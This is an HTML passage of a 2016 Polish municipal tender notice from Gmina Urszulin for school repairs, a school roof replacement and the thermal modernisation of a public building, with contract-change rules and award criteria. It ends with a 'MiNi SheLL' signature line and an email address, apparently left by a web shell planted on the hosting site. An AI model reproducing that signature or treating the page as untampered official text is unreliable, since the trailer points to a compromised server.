<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany i może być dopuszczalna tylko w granicach unormowania art. 144 ustawy Prawo Zamówień Publicznych.
Niedopuszczalna jest jednak zmiana postanowień zawartej umowy oraz wprowadzanie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmieniać treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili  zawarcia umowy. Zmiany dotyczyć mogą okoliczności wynikających z przyczyn technicznych, organizacyjnych, gospodarczych w zakresie :
1)	terminu realizacji umowy gdy jest ona spowodowana :
      -  warunkami atmosferycznymi uniemożliwiającymi wykonanie robót,
      -  działaniami siły wyższej,
      - wystąpieniem robót dodatkowych.
2)	zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak : śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zamawiający dopuszcza zmianę wynagrodzenia tylko w następujących przypadkach:
a)wystąpienia robót zamiennych,
b) rezygnacji z realizacji części robót,
c) wystąpienia robót dodatkowych,
d)zmiany stawki podatku VAT wynikającej z obowiązującego prawa.
Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień umowy, jeżeli proponowana zmiana może wpłynąć na opóźnienie lub obniżenie jakości przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurszulin.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Urszulin
22-234 Urszulin, ul. Kwiatowa 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2016 godzina 12:00, miejsce: Sekretariat Urzędu Gminy Urszulin
22-234 Urszulin, ul. Kwiatowa 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 16)	Projekt finansowany jest  ze środków Mechanizmu Finansowego EOG 2009 - 2014..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROBOTY REMONTOWE W ZESPOLE SZKÓŁ W URSZULINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowe w  budynku Zespołu Szkół w Urszulinie przy ulicy Szkolnej 23, w ramach projektu Termomodernizacja budynków użyteczności publicznej w gminie Urszulin.
1.	Schody - główne wejście do szkoły (segment łącznik F). Należy rozebrać dotychczasowe okładziny schodów i murków zewnętrznych z lastrico, przedłużyć - domurować murki zewnętrzne do wysokości pierwszego stopnia, górna krawędź murku równoległa do płaszczyzny schodów, wysokość jak istniejący już murek. 
2.	Schody boczne do części administracyjnej budynku (segment B). Należy skuć dotychczasowe okładziny schodów z lastrico, schody należy poszerzyć (do wymaganych min. 120 cm szerokości biegu) poprzez domurowanie brakującej części z bloczka betonowego na nowym fundamencie. Wykonać nowe okładziny schodów z kostki brukowej.
3.	Remont ścian wewnętrznych korytarza szkolnego (segment G) polegający na wyrównaniu nierówności tynków, wykonaniu tynków na powierzchniach po zamurowanych oknach, oraz malowaniu. 
Wykonawca prowadząc prace musi tak je organizować aby w jak najmniejszym stopniu dezorganizować pracę szkoły (prace będą realizowane w trakcie roku szkolnego) oraz zabezpieczyć roboty tak by nie stwarzały niebezpieczeństwa dla pracowników i dzieci. Ewentualne korzystanie przez Wykonawcę z przyłącza elektrycznego i wody będzie odpłatne a rozliczenie wg. wskazań podliczników Wykonawcy bądź ryczałtowej centy umownej. Wszystkie materiały rozbiórkowe Wykonawca zutylizuje i uprzątnie na własny koszt, a dokumenty potwierdzające przeprowadzenie tych czynności przedstawi Zamawiającemu. 
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.

Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie Wykonawcy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYMIANA POKRYCIA  DACHOWEGO  NA BUDYNKU SZKOŁY PODSTAWOWEJ W MIEJSCOWOŚCI WOLA WERESZCZYŃSKA ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana pokrycia dachowego na budynku Szkoły Podstawowej w Woli Wereszczyńskiej, działka nr ewid. 164. W ramach zamówienia należy wykonać:

1.	Rozbiórkę istniejącego pokrycia dachowego z blachy płaskiej ocynkowanej na rąbek stojący wraz z obróbkami (rynny, rury spustowe, wiatrówki, mury ogniowe, kołnierze, gzymsy, itp.) oraz instalacją odgromową.
2.	Rozbiórkę istniejących podbitek z desek drewnianych.
3.	Rozebrać ołacenie dachu.
4.	Dokonać przeglądu więźby dachowej oraz wymienić uszkodzone i osłabione elementy, wyrównać połacie dachowe.
5.	Wykonać izolacje z folii wysokoparoprzepuszczalnej przymocowanej do konstrukcji drewnianej.
6.	Wykonać ołacenie połaci dachowych (łaty i kontrłaty).
7.	Pokryć dach  blachą ocynkowaną  powlekaną na rąbek stojący o okresie gwarancji min. 30 lat (kolor do ustalenia z inwestorem). 
8.	Wykonać i zamontować obróbki blacharskie z blachy ocynkowanej powlekanej (rynny, rury spustowe, wiatrówki, mury ogniowe, kołnierze, gzymsy, itp.) kolor do ustalenia z inwestorem. 
9.	Wykonać nową instalacje odgromową oraz dokonać jej sprawdzenia. 
10.	Wykonać podbitki z paneli z tworzyw sztucznych na ruszcie drewnianym (kolor do ustalenia z inwestorem).
11.	Wykonać przegląd kominów wentylacyjnych; udrożnić ewentualnie niedrożne przewody wentylacyjne, rozebrać elementy skorodowane, uzupełnić  brakujące i rozebrane części, wzmocnić poprzez oklejenie siatką, wyrównać ściany, obrobić blachą trapezową (kolor do uzgodnienia z inwestorem).  Wymienić i uzupełnić brakujące kratki wentylacyjne, obrobić czapki kominowe  blachą ocynkowaną powlekaną (kolor do uzgodnienia z inwestorem).

Prace muszą być prowadzone tak aby nie uszkodzić wykonanego docieplenia i elewacji. Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt. Należy przewidzieć konieczność ewentualnego uzupełnienia docieplenia bądź uszczelnienia piankami powstałych mostków termicznych przy podbitkach.
Wykonawca musi dostosować prace i odpowiednio je zabezpieczyć przed personelem, uczniami szkoły (w przypadku gdy prace będą wykonywane w czasie trwania roku szkolnego) i osobami postronnymi.
Prace muszą być prowadzone tak aby zabezpieczyć  pomieszczenia  budynku szkolnego przed hałasem, uszkodzeniami (zalaniem)  i zanieczyszczeniem.  Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt.
Materiały rozbiórkowe metalowe (blachy z pokrycia dachu,  obróbek blacharskich rynien, rur spustowych itp. Wykonawca złoży w miejscu wskazanym przez inwestora. Pozostałe materiały rozbiórkowe i ewentualnie powstałe w czasie wykonywania prac odpady i śmieci Wykonawca ma obowiązek przeznaczyć do recyklingu bądź  zutylizować na własny koszt, a dokumenty potwierdzające wykonanie tych czynności przedstawić Inwestorowi.
Korzystanie podczas wykonywania prac przez Wykonawcę z energii elektrycznej i wody z przyłącza  Szkoły Podstawowej w Woli Wereszczyńskiej będzie odpłatne. Rozlicznie będzie się odbywało na podstawie odczytu podlicznika który zapewni Wykonawca, bądź ryczałtowo na podstawie ceny umownej. 
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.
Szczegółowy zakres zamówienia zawarty jest  w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie Wykonawcy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TERMOMODERNIZACJA BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ  W URSZULINIE PRZY UL. LUBELSKIEJ 31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie termomodernizacji budynku użyteczności publicznej przy ul.   Lubelskiej 31 w Urszulinie  w ramach zadania Termomodernizacja budynków użyteczności publicznej w Gminie Urszulin.
W ramach przewidzianych do wykonania robót należy wykonać:

1.	Docieplenie ścian budynku styropianem:

- ściany piwniczne na gruncie oraz fundamentowe po uprzednim odkopaniu z wykonaniem izolacji, docieplenie 5 cm styropian XPS 035  z wykonaniem izolacji przeciwwilgociowej i zabezpieczeniem folią,
- ściany zewnętrzne cokołowe docieplenie 5 cm styropian XPS 035. Z wyprawą tynkarską akrylową po uprzednim przygotowaniu płaszczyzn do wykonania prac: skucie tynków i okładzin z płytek, uzupełnienie brakujących tynków, gruntowanie,
- ściana zewnętrzna kondygnacji nad cokołem docieplenie 16 cm styropian EPS 70-040, z wyprawą tynkarską akrylową.
Kolory elewacji (cokołów i ścian) do uzgodnienia z Zamawiającym. Część elewacji ok. 140 m2 wykończenie deską elewacyjną kompozytową na stelażu - kolor do ustalenia z Zamawiającym.
Wykonawca musi przewidzieć konieczność zwiększenia grubości warstwy styropianu w miejscach nierówności ścian, nierówności przejść cokół - ściana tak aby utrzymać płaszczyzny ścian oraz równe odstępy na przejściach cokół - ściana.
Wykonawca musi przewidzieć demontaż i powtórny montaż urządzeń znajdujących się na ścianach zewnętrznych budynków takich jak, wyłączniki, kamery, okablowanie, instalacja odgromowa, tablice pamiątkowe oraz  demontaż i wymianę na energooszczędne (LED) oświetlenia zewnętrznego.
Wykonawca musi przewidzieć wykonanie nowej opaski odwadniającej wokół budynku odbudowę ciągów pieszych  zdemontowanych podczas prac termomodernizacyjnych oraz odtworzenie zieleni - trawników.

2.	Naprawa pokrycia dachowego i docieplenie dachu w technologii papy termozgrzewalnej papa modyfikowana  na osnowie poliestrowej.
W skład robót wchodzi:
- demontaż obróbek blacharskich rynien, rur spustowych, gzymsów , kołnierzy, instalacji odgromowej, itp.,
- wykonanie przeglądu kominów wentylacyjnych, udrożnienie i ich naprawa poprzez otynkowanie i wyrównanie ścianek,  naprawa czapek kominowych z obrobieniem ich blachą płaską i zamontowaniem metalowych kratek zabezpieczających,  
- wykonanie pokrycia dachu papą termozgrzewalną,
- wykonanie nowej instalacji odgromowej wraz z jej sprawdzeniem - wykonać pomiary,
- wykonanie i zamontowanie nowych obróbek blacharskich, rynien, rur spustowych, kołnierzy, obróbek murów ogniowych itp.

3.	Wymiana okien i drzwi wejściowych 
Zakres prac obejmuje:
- demontaż starych okien i drzwi na poziomie parteru budynku i częściowo na pierwszym piętrze,
- montaż nowych okien z PCV  i drzwi z aluminium wyposażonych w funkcję rozszczelniania o parametrach dla okien U mniejsze lub równe 0,9 W/m2K; dla drzwi   U mniejsze lub równe  1,3 W/m2K, obrobienie i malowanie glifów od strony wewnętrznej oraz montaż podokienników wewnętrznych i zewnętrznych. Nowe okna i drzwi w barwie grafitowej,
- wykonanie rozkuć i zamurowań tam gdzie zmienią się wymiary otworów okiennych, 
- w części budynku zajmowanej przez Komisariat Policji oraz pomieszczeniu serwerowni GOPS należy zamontować okna i drzwi  antywłamaniowe III klasy z klamkami zabezpieczonymi zamkiem.
4.	Wykonanie zadaszenia schodów zewnętrznych.
Częściowe rozebranie konstrukcji istniejących daszków z wymianą podpór z rur na profile stalowe o przekroju kwadratowym, wykonanie nowej konstrukcji nośnej metalowej wypełnionej wodoodporną płytą OSB z obróbką styropianem i wyprawą tynkarską, pokryte blachą trapezową. 

Wykonawca na własny koszt dokona utylizacji i recyklingu wszystkich materiałów rozbiórkowych: okien, drzwi, obróbek blacharskich i innych i przedstawi dokumenty to potwierdzające. Zamawiający pozostawia sobie prawo zagospodarowania niektórych wskazanych demontowanych elementów wyposażenia we własnym zakresie. W tym przypadku elementy te należy złożyć w miejscu wskazanym przez Zamawiającego. 
Ze względu na konieczność prowadzenia prac budowlanych na budynku w którym w trakcie tych prac  będą funkcjonowały urzędy (Policja, GOPS, Gminna Biblioteka Publiczna) prace te powinny być wykonywane tak aby w jak najmniejszym możliwym stopniu zakłócić pracę tych instytucji oraz w sposób bezpieczny dla ich pracowników i interesantów.
Przed złożeniem oferty Wykonawca jest zobowiązany zapoznać się w terenie z rodzajem, rozmiarem prac oraz usytuowaniem budynków objętych przedmiotową inwestycją.
Wykonawca musi wziąć pod uwagę , konieczność ewentualnego  uzgadniania przebiegu i harmonogramu prac z firmą która będzie wykonywała remont i przebudowę kotłowni w tym budynku a która będzie wyłoniona w innym postępowaniu.
Korzystanie przez Wykonawcę z energii elektrycznej i wody będzie odpłatne. Opłata zostanie ustalona na podstawie wskazań podliczników, które zapewni Wykonawcy, bądź ryczałtowo wg ceny umownej.
W ramach prowadzonych prac Wykonawca wykona i zamontuje  w miejscach wskazanych przez Inwestora  budki lęgowe dla ptaków  i schrony dla nietoperzy.
Budki lęgowe dla  wróbli - 3 szt.,  jerzyka 4 szt.,  pójdźki - 1 szt., kawki - 3 szt., półek gniazdowych dla oknówek 2 szt., 12 szt. schronów podtynkowych dla nietoperzy.
Ponadto w miejscach i ilościach wskazanych przez Inwestora, Wykonawca pozostawi otwory wlotowe na strychy dla nietoperzy. W kwestii wyboru odpowiednich budek oraz miejsc ich umieszczenia Wykonawca musi współpracować z ornitologiem kierując się jego wskazaniami.
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.
Szczegółowy zakres zamówienia zawarty jest  w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Doświadczenie Wykonawcy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com